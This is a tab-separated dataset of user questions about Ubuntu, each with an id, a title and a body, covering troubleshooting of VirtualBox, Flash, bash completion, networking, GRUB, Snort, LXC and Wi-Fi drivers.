376261	how to enable vt-x to adjust the processor of a vm	i am using oracle vm virtualbox . i 've been trying to adjust the process of my virtual machine but the slider of the processor on the processor tab is disabled . as far as i know , vt-x should be enabled on the acceleration tab , but the problem is that tab is also disabled . i tried to enable 3d acceleration on display , but the process just improved a little . there is also an issue on adjusting the base memory of the vm such as it only considers upto 3175 mb . upon checking bios , virtualization technology is already enabled . this is the spec of my host machine : processor : intel ( r ) xeon ( r ) cpu e5620 @ 2.40ghz ( 16cpus ) this is the snapshot of the vm 's settings
376263	adobe flash not working firefox or chromium	i 'm new to ubuntu but i think i did everything right . adobe flash says its installed and i 've uploaded the latest firefox and chromium . when i go to youtube all i see is a black screen where the video should be and no image , same in chromium , but at least chromium says it ca n't load plugin . have tried various fixes on this web site but to no avail . have to be doing something wrong or missing some step while quietly going crazy . can someone please help me ?
376265	adobe flash player upgrade	i am running lubuntu right now and i 'm new to linux . i went to youtube and it said i needed to upgrade adobe flash player and litte window in the to left hand corner came up saying to install plugin needed so i pressed it and then it said no suitable plugins found . so then i pressed download from adobe and i just downloded the first thing which was yum assuming thats the linux version of the plugin i needed . then i opened the yum download and archive manager came up and now i do n't know what to do . help please
376266	bash completion does n't work , or is ignoring what i 've typed ; but works for commands	bash completion seems to be ignoring what i 've typed ( it tries to complete , but acts as if there 's nothing under the cursor ) . i know i saw it work on this machine earlier today , but i 'm not sure what has changed . some examples : cd shows all directories under my current folder : $ cd co < tab > < tab > cmake/ config/ doc/ examples/ include/ programs/ sandbox/ src/ .svn/ tests/ commands like ls and less show all files and directories under my current folder : $ ls co < tab > < tab > cmake/ config/ .cproject doxyfile.in include/ programs/ readme.txt src/ tests/ cmakelists.txt copying.txt doc/ examples/ mainpage.dox .project sandbox/ .svn/ even when i try to complete things from a different folder , it gives me only the results for my current folder ( telling me that it is completely ignoring what i 've typed ) : $ cd ~/d < tab > < tab > cmake/ config/ doc/ examples/ include/ programs/ sandbox/ src/ .svn/ tests/ but it seems to be working fine for commands and variables : $ if < tab > < tab > if ifconfig ifdown ifnames ifquery ifup $ echo $ p < tab > < tab > $ path $ pipestatus $ ppid $ ps1 $ ps2 $ ps4 $ pwd $ pythonpath i do have this bit in my .bashrc , and i have confirmed that my .bashrc is indeed getting sourced : if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi i 've even tried manually executing that file , but it does n't fix the problem : $ . /etc/bash_completion there was even one point in time where it was working for ls , but was not working for cd ... but i ca n't replicate that result now . update : i also just discovered that i have terminals open from earlier that still work . i ran source .bashrc in one of them and afterwards completion was broken . here is my .bashrc : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # # modified by neil traft # source ~/.profile # allow globs to expand hidden files shopt -s dotglob nullglob # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # color the prompt export ps1= '' \ [ $ ( tput setaf 2 ) \ ] \u @ \h : \ [ $ ( tput setaf 5 ) \ ] \w\ [ $ ( tput setaf 2 ) \ ] $ \ [ $ ( tput sgr0 ) \ ] `` # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi
376268	how to download entire youtube channel using commands or application	i want to download entire youtube channel using ubuntu , but i ca n't find way to download , any help appreciate !
376271	squidguard : error while loading shared libraries : libdb-6.0.so : can not open shared object file : no such file or directory	i tried to install squidguard-1.4 . i successfully install but i ca n't load it using this command squidguard -d it turn out like this result : squidguard : error while loading shared libraries : libdb-6.0.so : can not open shared object file : no such file or directory what are the solution for this kind of error ? can somebody help me ?
376273	standard update urls	what are the standard update urls for ubuntu 13.10 . for example , is this a standard one : http : //ppa.launchpad.net/tiheum/equinox/ubuntu ? by standard i mean those update sources that are added by default when one installs a fresh copy of ubuntu 13.10 .
376276	internet is not working in base machine	i have a ubuntu desktop . i am running a virtual windows machine using virtual box . few days before internet is not working in ubuntu but it is working in the virtual machine . even the samba shares are also accessible . i do n't know why internet is not working in the base machine . i have tried to ping google.com , but it returns ubuntu @ desktop : ~ $ ping google.com ping : unknown host google.com ifconfig command 's output ubuntu @ desktop : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:27:0e:1b:86:2a inet addr:192.168.1.7 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :227 : eff : fe1b:862a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:38221 errors:0 dropped:0 overruns:0 frame:0 tx packets:28161 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:39144616 ( 39.1 mb ) tx bytes:6143919 ( 6.1 mb ) interrupt:27 base address:0x2000 eth0:0 link encap : ethernet hwaddr 00:27:0e:1b:86:2a inet addr:192.168.2.7 bcast:192.168.2.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 interrupt:27 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:14944 errors:0 dropped:0 overruns:0 frame:0 tx packets:14944 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1735451 ( 1.7 mb ) tx bytes:1735451 ( 1.7 mb ) vmnet1 link encap : ethernet hwaddr 00:50:56 : c0:00:01 inet addr:192.168.243.1 bcast:192.168.243.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fec0:1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:77 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) vmnet8 link encap : ethernet hwaddr 00:50:56 : c0:00:08 inet addr:172.16.162.1 bcast:172.16.162.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fec0:8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:78 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
376277	is there any gui application for flash media live encoding for ubuntu or linux	i need to broadcast a tv channel to a website . i need a gui application for flash media live encoding . famous adobe fme does not have a linux version . i did try to install open broadcast encoder in ubuntu 13.04 64amd but wasnt successfull . so the things that i need to know are ; is there any gui application for flash media live encoding for ubuntu or linux ? is it able to succesfully install open broadcast encoder in ubuntu ?
376278	two problems , both with either lock or suspend .	i recently did two things that may be the cause of either of them . 1 ) i started using a second screen 2 ) i installed xscreensaver instead of the stock , power saving option . my first question is about suspend : every time i wake from suspend , networking is disabled . while i 've seen multiple posts about that on here , it did n't start happening until recently . second , lock seems to be disabled now . are both of these problems a bug , or was this caused by the second screen or maybe xscreensaver ?
376280	what is the meaning of `` ps -aef | grep $ ( pwd ) '' command ?	what is the meaning of this command , what does it do ? ps -aef | grep `pwd`
376285	installing ubuntu 12.04 on nuc intel i3 dc3217iye	system : nuc i3 , 2 hdmi ports , ethernet , no wireless . uefi boot 2x2gb ram 30gb msata internal drive ubuntu 64bit 12.04.03 hello i am having much trouble loading an os on my nuc . i started out attempting another os with various loaders ( beast/hack ) without much success , ( various panics on boot or endless reboot loops , or graphics failures ) after many tries i decided to attempt ubuntu . many years ago i loaded ubuntu on an e-machine without an issue so i figured it would go smoothly , nothing could be further from the truth . the live usb stick loads , but when i am installing the os it always fails to load grub 2 . obviously it wont boot from ssd without grub2 . i searched and found that boot-repair should fix it ... so i created a live usb with boot repair ... it refuses to repair the grub because the install never finished and the needed partions are not fully created and flagged . it also demands an internet connection which i am unable to provide . i then ran gparted in an attempt to create the needed partitions manually , then re-ran boot repair turning off the `` check internet '' option . and disabling the re-install grub hoping it would create the missing directories and or fix the flags . it appeared to run successfully but upon return to the ubuntu live usb it still fails at the grub2 install . also gparted doesnt have the same choices that ubuntu install has when creating partitions , causing it to not recognize that i already had a root , or an efi directory or it sometimes couldnt tell what the format of the partition was ... all very annoying the reason i cant connect to internet ( and cant upload the error logs ) is the nuc only has ethernet and the location i have to set up is too far away from modem . i can not move the monitor closer to modem as it is a 50inch lcd . i just want to do a basic install with one user acct and remote desktop ( vnc ) turned on so i can move the nuc to the modem connect via ethernet and then finish setting it up via remote desktop/vnc chicken from my mac . while i await any assistance you maybe able to provide i am going to attempt to switch to the 32bit version and legacy boot to see if that can load grub . thnx again to anyone that can come up with a possible solution . i would love to hit `` erase and install ubuntu '' if anyone can figure out what is stopping that simple answer from working . also disks ( cd/dvd ) are not an option as neither my mac mini or my nuc have optical drives , and i have no desire to buy one for one task
376286	install windows 7 on seperate partitions without losing grub	i have windows 8 installed on a separate partition which i want to replace with windows 7 and ubuntu 12.10 installed on a separate partition . i want to do this without losing grub . how should i do it ?
376291	can synaptic install application from a .tar.gz file downloaded from outside the repositories ?	i would like to know if synaptic package manager can install an application from a .tar.gz file downloaded from a different source than is in the repositories in /etc/apt/sources.list . i mean those files need to run ./configure , make , sudo make install to install . does synaptic perform these operations ?
376305	ubuntu 13.10 login fails on 1st attempt but works on 2nd	i just installed ubuntu 13.10 onto it 's own hard drive , and i having a slight annoyance when logging in . the first couple times rebooting the computer i noticed that , i was getting the incorrect password error on the first attempt , but the second attempt will work correctly . at first i thought this was just a typing issue , but i verified that i am entering the correct one . this has happened every time i login . the first attempt fails , and the second is fine . does anyone know of any fixes for this ? thanks for the help in advance .
376307	problem with ati catalyst drivers in ubuntu 13.10	recently i 've installed ubuntu 13.10 alongside windows 8 ( dual boot ) . my laptop is dell inspiron 15 , with amd radeon hd 7670 video card . without fglrx my expected battery life is reduced to 1:30 hrs from 3:30 hrs ( in ubuntu 13.04 but very slow booting ) . so i installed fglrx using this answer . but the problem is as you all know , black screen after logging into ubuntu . tried so many solutions for this like reinstalling unity , ubuntu-desktop , compizconfig , etc . but none helped except removing fglrx* completely . ( but i need them very badly due to battery ) ps . for those who think this question is a duplicate . though the question may be a duplicate , but the answer is not !
376309	how to add songs to ipod from ubuntu 13.10 ?	how can i add songs to my ipod from ubuntu 13.10 . is there any softwares similar to itunes . i tried gtkpod ipod manager for adding music to my ipod but it crashes every time i try to add songs to ipod.is there any other way to add songs to ipod ?
376311	if matlab is in the ubuntu apps , does it means that its open source ?	matlab is not a free software . in ubuntu apps page matlab is open source . does that mean it is free ?
376312	trouble publishing plex media server . should i disable dns relay ?	just like the title says . i have tried and tried again to get this media server published to myplex and it never works . i have set a static ip address ( i think ) . and i was looking in the router settings under lan and there is an option to disable dns relay . i am on a brand new wd mynet 750 router .
376314	increase data transfer speed in lan	i want to increase data transfer speed in local area network . i have one server and a netgear 10/100 16-port switch and 15 pcs attached to it . my network speed is too slow . how can i increase the data transfer speed in my lan ?
376317	exit command with any key	here 's what i have : a script that records sound and exits when pushing ctrl+c arecord -d plughw:0,0 -f cd -t wav -d 0 -q -r 16000 > file this will record and record until i push ctrl+c i want to simulate the ctrl+c action , by pushing any key ( preferably one keystroke )
376318	startup script / profile from grub	i 've been looking at other posts here and they 've really helped , i feel like i 'm stuck at one spot . i have taken a script from a machine that already has this setup . unfortunately the person who implemented this script is no longer around to ask . i keep getting 'mount ' errors , i feel like i 'm just missing the link to my script . i have ubuntu 13.10 installed , however this script is to run before x is loaded - i do n't see any desktop or linux splash screen or anything on the machine this is setup on ( in fact there is a custom splash ) ... this is a 2 step backup / restore application : grub either times out to windows , or someone can make a selection to restore the windows partition by selecting the 'restore ' option and confirming that is what they wanted to do ( with a password of course ) and that 's it ! no options for them to inevitably screw up - like they always do ... we all know those people ... 2 questions : ( 1 ) i have grub commands as follows : menuentry `` factory reset '' -- users tech { linux ( hd0,6 ) /vmlinuz root=uuid= # # # # # # # optiontype=factory_reset ro quiet splash nomodset initrd ( hd0,2 ) /initrd.img # and others like this with the optiontype= ( value ) changed ... this i do n't see this as my problem , it is nearly verbatim to the machine it is operating properly on . only question here : to is do i need the uuid here or can i just reference the sda # ? windows is the only system to ever be used on sda1 . can windows actually change this value ? this will give me more flexibility when cloning to the full hd to dozens of machines . question 2 : how do i get the optiontype= ( value ) in grub2 to reference my script ? where do i place this script ? do i have to put it somewhere and run initrd update so it is included in the initrd file ? in the kernel ? # ! /bin/bash optiontype= $ ( awk '/optiontype=/ { print substr ( $ 3,12 ) } ' /proc/cmdline ) echo $ optiontype if [ `` $ optiontype '' = `` factory_reset '' ] ; then if test -f /backup/factory_reset.img ; then dialog -- yesno `` if you continue all data will be lost and this machine will be reset to the original out-of-box factory state . are you sure ? '' 10 60 case $ ? in 0 ) partclone.ntfs -n -r -s /backup/factory_reset.img -o /dev/sda1 dialog -- msgbox `` factory reset complete '' 10 60 esac reboot else dialog -- yesno `` no factory reset image exists . do you want to save the current settings as the factory default of this computer ? '' 10 60 case $ ? in 0 ) echo `` saving factory reset '' partclone.ntfs -n -c -o /backup/factory_reset.img -s /dev/sda1 dialog -- msgbox `` factory settings stored '' 10 60 reboot fi fi and so on ... . several other options ... . blah blah also , once this is referenced , do i need to rebuild the kernel to include partclone ? or is having it installed on the machine enough ? if i take the optiontype= ( value ) portion out , it will boot into linux no problem . ( though i realize that could be my problem ... wrong kernel ? ) i 've literally been at this for a week and a bit ( this application and linux ... total noob ... i script in windows ... ) . i am definitely liking linux ! seems much more flexible and forgiving , not to mention the community support ! thanks !
376319	keyboard backlight function keys for samsung series 9 np900x3d and ubuntu 13.10	i purchased a new samsung new series 9 np900x3d and installed ubuntu 13.10 tonight . the keyboard illumination function keys do not work . i 've read on https : //help.ubuntu.com/community/samsungseries9 to edit the /lib/udev/keymaps files , however , these files do not exist in ubuntu 13.10 . how do i get the function keys for keyboard illumination to work properly for ubuntu 13.10 ?
376321	wubi machine and ... vmware	i installed latest ubuntu in windows via wubi , all good and nice , it is working nicely ; ) now , the question how can i start that wubi ubuntu also in vmware in windows ? in theory it is possible be cause the partition where ubuntu loop lies is mountable via samba , and vmware have local , self sharing that is working at maximum speed so , any idea ? or i 'm asking for too much ? : )
376322	ubuntu 13.04 server cant install centrifydc apt package e : unable to locate package centrifydc	i get an unable to locate package error when i try to install centrifydc using apt-get . steps taken : i sudo nano 'd /etc/apt/sources.list and uncommented the two partner urls . then i performed a sudo apt-get update . then i performed a sudo apt-get install centrifydc . ... stumped .
376326	ubuntu on sony tablet s	as a ubuntu user in my home/work i want to install it on my tablet . the tablet is a sony tablet s , but i did n't found trustable info anywere . it is possible to install ubuntu on sony tablet s ? if it is , how can i do it ? thanks , diego
376327	mousetweaks hogging resources	opening system monitor , mousetweaks is using between 2 % and 8 % of my cpu 's resources . this is a nice program but i need it to use less resources , or i 'll un-install it . except for nautilus , chromium , system-monitor , and the mouse ; the rest of the programs do n't use above 0 % , leaving the mouse or the tweak program 's suspect .
376330	installing and configuring snort , barnyard2 on ubuntu 13.10 in aws ec2 vpc	i need you help after searching a whole lot and asking aws my problem is not getting resolved , so i have come here for your help . i have a aws vpc setup with all ubuntu servers i have a nat server created which has snort and barnyard installed , i followed the following guide snort , barnyard2 , pulledpork and aanval the versions used for snort and barnyard are the latest and not from the guide . using the following command shows that the data is getting sniffed over the network tcpflow -i eth0 -c -e port 80 the problem is there are no events being created in the db and i am unable to test if snort is functioning properly the commands used for snort is /usr/sbin/snort -a fast -b -d -d -i eth0 -u snort -g snort -c /usr/local/snort/etc/snort.conf -l /var/log/snort/eth0 the command used for barnyard is barnyard2 -d -c /etc/snort/barnyard.conf -d /var/log/snort/eth0 -w /var/log/snort/eth0/barnyard2.waldo -l /var/log/snort/eth0 -a /var/log/snort/eth0/archive -f snort.log -x /var/lock/barnyard2-eth0.pid please guys help me with this . i thank you guys in advance . p.s . i am really new to snort and barnyard2 please guide me step by step .
376332	update fail 12.04	update manager fail to update ubuntu 12.04 please help w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_precise_multiverse_binary-amd64_packages hash sum mismatch
376333	connecting ubuntu 12.04 with network without login using wicd	i installed wicd , and purge the network-manager-gnome . i want my network to connect on boot automatically , without login to any user . how can i setup wicd for this purpose ? currently my wicd does not connect automatically even on user login , every time i give wicd-gtk for connection . i already have tried wpa_supplicant but no luck .
376335	playing games in ubuntu 12.04	i am having a laptop belongs to a university . details ; hp probook having amd , 5350 memory , 7 gb ram , amd radeon x2 graphics . installed with ubuntu 12.04 i am new to linux . the thing is i want to play games on it . i searched on the net . there are few software like wine , playon linux etc . but i am not able to play with them . i have also got an advice to dual booting windows . but i do n't want to break grub . as i am not so professional in such things and if something went wrong then i would have to pay to the university . please help me . i am in great trouble . virtual box is also an handy application to run windows application . but i do n't know how to use it .
376341	my wifi is not working in ubuntu 12.04	yesterday , i installed micromax mmx 144f modem in my ubuntu 12.04 . now , my wifi is not working in ubuntu 12.04 before modem installation it is working fine . i am using acer aspire e1-571 model lap . when i start my lap in ubuntu it is show like below and started perfectly . try ( hd0 0 ) ntfs5 : no wubildr try ( hd0 1 ) ntfs5 : no wubildr try ( hd0 2 ) ntfs5 : error : `` prefix '' is not set . can any one please help me . thanks
376345	allow loop mounting files inside lxc containers ?	i 'm trying to set up a maas server inside an lxc container . when i import the pxe files , it needs to be able to mount loop devices . i have set the following options in the container config file to allow loop mounting , but i 'm missing something . lxc.cgroup.devices.allow = b 7 : * rwm lxc.cgroup.devices.allow = c 10:237 rwm i get the following error because the script can not loop mount a file : mount : can not mount block device /dev/loop0 read-only wed , 13 nov 2013 07:26:41 +0000 : failed to mount /var/lib/maas/ephemeral/precise/ephemeral/i386/20131010/disk.img traceback ( most recent call last ) : file `` /usr/sbin/maas-import-ephemerals '' , line 26 , in < module > main ( args ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/import_images/ephemerals_script.py '' , line 428 , in main target.sync ( source , args.path ) file `` /usr/lib/python2.7/dist-packages/simplestreams/mirrors/__init__.py '' , line 85 , in sync return self.sync_index ( reader , path , data , content ) file `` /usr/lib/python2.7/dist-packages/simplestreams/mirrors/__init__.py '' , line 237 , in sync_index self.sync ( reader , path=epath ) file `` /usr/lib/python2.7/dist-packages/simplestreams/mirrors/__init__.py '' , line 83 , in sync return self.sync_products ( reader , path , data , content ) file `` /usr/lib/python2.7/dist-packages/simplestreams/mirrors/__init__.py '' , line 315 , in sync_products self.insert_item ( item , src , target , pgree , ipath_cs ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/import_images/ephemerals_script.py '' , line 251 , in insert_item self.extract_item ( path , flat ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/import_images/ephemerals_script.py '' , line 295 , in extract_item tarball , target_dir , temp_location=self._simplestreams_path ( ) ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/import_images/ephemerals_script.py '' , line 124 , in extract_image_tarball call_uec2roottar ( image , os.path.join ( target_dir , 'dist-root.tar.gz ' ) ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/import_images/ephemerals_script.py '' , line 97 , in call_uec2roottar subprocess.check_call ( [ `` uec2roottar '' ] + list ( args ) ) file `` /usr/lib/python2.7/subprocess.py '' , line 540 , in check_call raise calledprocesserror ( retcode , cmd ) subprocess.calledprocesserror : command ' [ u'uec2roottar ' , u'/var/lib/maas/ephemeral/precise/ephemeral/i386/20131010/disk.img ' , u'/var/lib/maas/ephemeral/precise/ephemeral/i386/20131010/dist-root.tar.gz ' ] ' returned non-zero exit status 1 root @ maaslxc2 : ~ # mount /dev/loop0 /mnt mount : block device /dev/loop0 is write-protected , mounting read-only mount : can not mount block device /dev/loop0 read-only so , what do i need to change in the container 's configuration to allow it to mount loop devices ? it appears that this is not just a maas problem , but a restriction that would cause trouble for anything ( not just maas ) that needs to loop mount a file in a lxc container .
376346	accidentaly disabled keyboard	i 've got a problem , i tried to disable the touchpad by using : xinput list xinput set-prop 12 `` device enabled '' 0 problem is i put the wrong number , 12 is not the touchpad , but my keyboard . how can i enable it again without using the terminal ? i have ubuntu 12.04 .
376349	ubuntu 13.10 ca n't detect windows 7 and ntfs partition	i have already windows -7 installed on my pc . and i want to install ubuntu 13.10 alongside windows-7 . but while installing ubuntu , it doe n't give me option to install ubuntu alongside windows and also ca n't detect windows and partition too ... what i can do now ? ? ? sry for my poor english ... .
376350	on ubuntu 12.04 , upgraded kernel to 3.4.0 ; after that there is no wifi	i am using dell vostro which is : uname -a : linux applect 3.4.0-030400-generic # 201205210521 smp mon may 21 09:22:02 utc 2012 x86_64 x86_64 x86_64 gnu/linux i used to have frequent freeze issue . to solve that problem i upgraded kernel from 3.2.0 to 3.4.0 following this link . now there is no wifi on my system . please help . output of some of the commands required are : lspci- > 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation panther point pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) lspci -nnk | grep -ia2 net - > 07:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4365 ] ( rev 01 ) subsystem : dell device [ 1028:0016 ] 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 07 ) subsystem : dell device [ 1028:0556 ] kernel driver in use : r8168 lsusb - > bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 006 : id 0a5c:21d7 broadcom corp . bus 001 device 004 : id 0c45:6473 microdia 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 07:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) lsmod- > module size used by ath9k 139686 0 mac80211 519398 1 ath9k ath9k_common 14057 1 ath9k ath9k_hw 405977 2 ath9k , ath9k_common ath 23896 3 ath9k , ath9k_common , ath9k_hw cfg80211 202006 3 ath9k , mac80211 , ath snd_hda_codec_hdmi 32111 1 snd_hda_codec_cirrus 23910 1 parport_pc 32734 0 bnep 18190 2 rfcomm 47012 0 ppdev 17180 0 binfmt_misc 17498 1 bluetooth 206685 10 bnep , rfcomm snd_hda_intel 33332 3 snd_hda_codec 123847 3 snd_hda_codec_hdmi , snd_hda_codec_cirrus , snd_hda_intel snd_hwdep 13652 1 snd_hda_codec joydev 17597 0 snd_pcm 97231 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 i915 484383 2 snd_rawmidi 30655 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61538 2 snd_seq_midi , snd_seq_midi_event drm_kms_helper 46958 1 i915 drm 265069 3 i915 , drm_kms_helper snd_timer 29708 2 snd_pcm , snd_seq snd_seq_device 14490 3 snd_seq_midi , snd_rawmidi , snd_seq coretemp 13602 0 uvcvideo 72690 0 videobuf2_core 32801 1 uvcvideo videodev 111615 1 uvcvideo snd 79086 16 snd_hda_codec_hdmi , snd_hda_codec_cirrus , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device videobuf2_vmalloc 12860 1 uvcvideo i2c_algo_bit 13509 1 i915 dell_wmi 12681 0 ghash_clmulni_intel 13180 0 soundcore 14996 1 snd snd_page_alloc 18572 2 snd_hda_intel , snd_pcm sparse_keymap 13890 1 dell_wmi dell_laptop 18024 0 video 19280 1 i915 dcdbas 14438 1 dell_laptop videobuf2_memops 13368 1 videobuf2_vmalloc wmi 19141 1 dell_wmi aesni_intel 51530 0 psmouse 87589 0 serio_raw 13211 0 mac_hid 13205 0 mei 40904 0 lp 17789 0 cryptd 20396 2 ghash_clmulni_intel , aesni_intel aes_x86_64 17208 1 aesni_intel microcode 22945 0 parport 46360 3 parport_pc , ppdev , lp dm_multipath 23171 0 ums_realtek 18000 0 uas 18003 0 usb_storage 48870 1 ums_realtek dm_mirror 22044 0 dm_region_hash 20805 1 dm_mirror dm_log 18518 2 dm_mirror , dm_region_hash btrfs 762010 0 zlib_deflate 26991 1 btrfs libcrc32c 12644 1 btrfs r8168 244643 0 [ permanent ] iwconfig - > eth0 no wireless extensions . lo no wireless extensions . ifconfig -a - > eth0 link encap : ethernet hwaddr 78:45 : c4 : c4:0d : d4 inet addr:10.0.2.39 bcast:10.0.7.255 mask:255.255.248.0 inet6 addr : fe80 : :7a45 : c4ff : fec4 : dd4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:97594 errors:0 dropped:0 overruns:0 frame:0 tx packets:25994 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:37189932 ( 37.1 mb ) tx bytes:5380864 ( 5.3 mb ) interrupt:41 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3027 errors:0 dropped:0 overruns:0 frame:0 tx packets:3027 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:310692 ( 310.6 kb ) tx bytes:310692 ( 310.6 kb ) route -n - > kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.0.0.11 0.0.0.0 ug 0 0 0 eth0 10.0.0.0 0.0.0.0 255.255.248.0 u 1 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0
376354	how can we add more ( not existing ) writing languages in ubuntu ?	actually khan academy has new initiative of hindi and urdu combining to write in roman script . and the new language will be called hamari . how its alphabets can be added in ubuntu ? alphabets already are in use . http : //en.wikipedia.org/wiki/roman_urdu
376359	what is difference between lts and non lts	i want to switch from windows to ubuntu completely . i am in a dilemma which version to choose . here it is showing 12.04 ( lts ) and 13.10 ( non lts ) . which is the best one to choose . i want full security features ( mainly this is the reason why i want to switch from windows ) and also the best features . i understood that lts is for long period and non lts is for short period . short period means it is necessary to upgrade to newer version every 6 months ? what is the upgrade procedure , can we just upgrade easily with few clicks and download the newer version or we have to format the previous version and install the newer one . please clarify my doubt . thanks in advance : )
376360	ubuntu one on android does n't sync files	i 've installed and set up ubuntu one on 2 ubuntu machines and one android . then i put keewpassx.kdb file in ubuntu one folder and it apeeared on android and the second machine . then i opened that file with keepassx app on android and added a new entry to it . then i exited from keepassxc app ( file was saved ) and syncronized ubuntu one on android . the first strange thing - ubuntu one sais that file was modified 21 hours ago , despite i modified it right 1 minute ago the second strange thing that file was n't updated on two ubuntu machines . how does ubuntu one work after all ?
376361	how to permanently remove `` @ public.talk.google.com '' contact from pidgin ?	every day i remove a weird contact from pidgin - the contact which looks like 12fgh4j84393j @ public.talk.google.com and the next day it appears . even more , this belongs to a contact i removed months ago , but can not remove this one . what i tried but did not help : unsubscribe block remove any suggestions ? note . i use ubuntu 12.04 with unity ( 64bit version )
376367	konsole does not execute .profile or .bash_profile	when i open konsole the settings in .profile are not executed , and it means the ~/bin is not added to the path . is there a way to get konsole to do that ? ps . is there a way to tell whether konsole is running bash or dash
